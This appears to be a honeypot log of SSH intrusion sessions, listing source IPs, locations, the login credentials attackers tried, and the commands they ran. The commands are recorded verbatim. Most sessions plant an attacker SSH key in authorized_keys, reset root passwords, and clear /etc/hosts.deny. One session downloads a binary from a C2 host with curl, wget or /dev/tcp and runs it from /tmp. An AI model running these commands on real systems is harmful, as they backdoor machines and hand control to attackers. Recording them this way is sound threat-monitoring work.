Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:gaHMrf07zytR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 capoeira_root_17 (177.85.247.230) β€” Timon, Brazil Β· 1 session Β· 19 cmds
2026-05-05 01:15 EDT Β· as root/stoneage
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ZsSQqdhi3iYy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_32 (8.138.92.126) β€” Guangzhou, China Β· 1 session Β· 3 cmds
2026-05-05 00:49 EDT Β· as root/12345678
echo β†’ payload download from C2 β†’ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://115.231.76.176:60105/linux -o /tmp/0HraQermPh; if [ ! -f /tmp/0HraQermPh ]; then wget http://115.231.76.176:60105/linux -O /tmp/0HraQermPh; fi; if [ ! -f /tmp/0HraQermPh ]; then exec 6<>/dev/tcp/115.231.76.176/60105 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/0HraQermPh ; chmod +x /tmp/0HraQermPh && /tmp/0HraQermPh aMqOEDZe3MRXNhSK0BAc3IsAKV7SxF4vGJbbHR3EjBEiWN7cVzgRitsHHduWFChB29tdIhiK2RgJ24AQNl7b00EpF4jEGxvfghguWN7KXSkYltMZB9iLFTZa0tBZKBGI3wkRxIkUIEHc00EpEoHQHxnZjAAsWMTYWyoOidoRB92JGi5f29pYOBGJ3wcb2YkOL1nE21guGo7aGBnfmBIqX8TbVygOgdMHHtuCFihe2t9PLBmW2BocxI4RNlvf0FkrEojKGBvZlhEqVsTYXSsOj98TENqMEjhZ28ReLxGW3BEH24gXIlnd2Fc4EYnYBxjYjA4rXMTSWCIWiNsdHsqADilb0sRZLA6K3hoT04EYLk/Y2l02EonEGBvblhIpWdDTXCgXmNIHGNmADiFdxNtdLhqA0x8ayowXNl3e2EEpEIDEHhjQjhApX93KVykOjtIHG9iNDilf2tBZKhKJyhgb25YUKUHe2kEpEYrQERvZiQAqX9jEXSkOidgYB9iJFiJW2dpYOBiMxBofxIkSKEHe3lUgFoDTCRjbjw4tVsTbXS0OidwfE9yMFixP29JYNhGK3gcb24sOKVnS0FgtEI7KGBjYlhIvQdjZWDYVidAQENmAACxYxN1ZNhKK2wcd2oIWL13ayl4pGZbbEBDEixU2XdrZVS4QidocCduAEDZY3MReKxeW2R4T3IgRK1rK21ctDoncGAfbjw4pVd3ZWC0AjN0HG96KDi1XxNJbIhaI2xkQyowXNl3Z00EpGYnEGB7dghYqWNpHvQIccbR+lNtpPLpXbvD+; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/0HraQermPh && /tmp/0HraQermPh aMqOEDZe3MRXNhSK0BAc3IsAKV7SxF4vGJbbHR3EjBEiWN7cVzgRitsHHduWFChB29tdIhiK2RgJ24AQNl7b00EpF4jEGxvfghguWN7KXSkYltMZB9iLFTZa0tBZKBGI3wkRxIkUIEHc00EpEoHQHxnZjAAsWMTYWyoOidoRB92JGi5f29pYOBGJ3wcb2YkOL1nE21guGo7aGBnfmBIqX8TbVygOgdMHHtuCFihe2t9PLBmW2BocxI4RNlvf0FkrEojKGBvZlhEqVsTYXSsOj98TENqMEjhZ28ReLxGW3BEH24gXIlnd2Fc4EYnYBxjYjA4rXMTSWCIWiNsdHsqADilb0sRZLA6K3hoT04EYLk/Y2l02EonEGBvblhIpWdDTXCgXmNIHGNmADiFdxNtdLhqA0x8ayowXNl3e2EEpEIDEHhjQjhApX93KVykOjtIHG9iNDilf2tBZKhKJyhgb25YUKUHe2kEpEYrQERvZiQAqX9jEXSkOidgYB9iJFiJW2dpYOBiMxBofxIkSKEHe3lUgFoDTCRjbjw4tVsTbXS0OidwfE9yMFixP29JYNhGK3gcb24sOKVnS0FgtEI7KGBjYlhIvQdjZWDYVidAQENmAACxYxN1ZNhKK2wcd2oIWL13ayl4pGZbbEBDEixU2XdrZVS4QidocCduAEDZY3MReKxeW2R4T3IgRK1rK21ctDoncGAfbjw4pVd3ZWC0AjN0HG96KDi1XxNJbIhaI2xkQyowXNl3Z00EpGYnEGB7dghYqWNpHvQIccbR+lNtpPLpXbvD+" & // payload download from C2
$ head -c 3716336 > /tmp/zpOlSnQ51U // execute from /tmp
🎭 burger_7 (162.214.75.117) β€” Provo, United States Β· 1 session Β· 1 cmd
2026-05-04 23:16 EDT Β· as dev/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a // CPU profiling
🎭 wraith_root_17 (185.158.22.150) β€” Karbala, Iraq Β· 1 session Β· 19 cmds
2026-05-04 23:11 EDT Β· as root/123654987
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:1NoLEHr72Ib6"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_131 (151.33.122.67) β€” Turin, Italy Β· 1 session Β· 20 cmds
2026-05-04 23:06 EDT Β· as test/00
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "00\n31xYhSWqY5fU\n31xYhSWqY5fU"|passwd|bash
$ Enter new UNIX password:
$ echo "00\n31xYhSWqY5fU\n31xYhSWqY5fU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_44 (58.251.254.247) β€” Guangzhou, China Β· 1 session Β· 1 cmd
2026-05-04 22:27 EDT Β· as root/------fuck------
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 silk_root_33 (106.12.240.38) β€” Wuhan, China Β· 1 session Β· 20 cmds
2026-05-04 21:40 EDT Β· as admin/password@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password@123\n9Nw6iIwg1vCy\n9Nw6iIwg1vCy"|passwd|bash
$ Enter new UNIX password:
$ echo "password@123\n9Nw6iIwg1vCy\n9Nw6iIwg1vCy\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_115 (154.219.100.220) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-04 21:05 EDT Β· as arkserver/ark
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ark\nkhSRWhpaBX53\nkhSRWhpaBX53"|passwd|bash
$ Enter new UNIX password:
$ echo "ark\nkhSRWhpaBX53\nkhSRWhpaBX53\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 seoul_2 (211.228.218.47) β€” Dong-gu, South Korea Β· 1 session Β· 20 cmds
2026-05-04 20:55 EDT Β· as caduser/caduser
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "caduser\nIvIxGNtlo4Vn\nIvIxGNtlo4Vn"|passwd|bash
$ Enter new UNIX password:
$ echo "caduser\nIvIxGNtlo4Vn\nIvIxGNtlo4Vn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_34 (222.190.105.98) β€” Nanjing, China Β· 1 session Β· 1 cmd
2026-05-04 16:28 EDT Β· as root/root123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 specter_root_116 (103.82.36.79) β€” Thanh KhΓͺ, Vietnam Β· 1 session Β· 1 cmd
2026-05-04 15:04 EDT Β· as root/root123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 fjord_root (171.25.158.58) β€” Vaxjo, Sweden Β· 1 session Β· 20 cmds
2026-05-04 14:07 EDT Β· as ubuntu/Aa112233
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Aa112233\n7SJOo89Vjzfa\n7SJOo89Vjzfa"|passwd|bash
$ Enter new UNIX password:
$ echo "Aa112233\n7SJOo89Vjzfa\n7SJOo89Vjzfa\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 spice_root_21 (98.70.34.60) β€” Pune, India Β· 1 session Β· 20 cmds
2026-05-04 13:39 EDT Β· as ubuntu/232323
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "232323\nmKTcS4IBYcj0\nmKTcS4IBYcj0"|passwd|bash
$ Enter new UNIX password:
$ echo "232323\nmKTcS4IBYcj0\nmKTcS4IBYcj0\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_32 (14.103.112.56) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-04 12:55 EDT Β· as root/admin79
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:UddVu7fUcggp"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_117 (81.192.46.49) β€” Rabat, Morocco Β· 1 session Β· 20 cmds
2026-05-04 12:53 EDT Β· as newuser/test
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test\n8tTYIgKdyYRF\n8tTYIgKdyYRF"|passwd|bash
$ Enter new UNIX password:
$ echo "test\n8tTYIgKdyYRF\n8tTYIgKdyYRF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_45 (180.169.100.182) β€” Shanghai, China Β· 1 session Β· 3 cmds
2026-05-04 10:35 EDT Β· as ubuntu/123abc
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
🎭 seoul_root_24 (119.209.12.20) β€” Goyang-si, South Korea Β· 2 sessions Β· 40 cmds
2026-05-04 07:50 EDT Β· as ubuntu/3333333, ubuntu/system
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "3333333\nk56dGK1hrt29\nk56dGK1hrt29"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "3333333\nk56dGK1hrt29\nk56dGK1hrt29\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
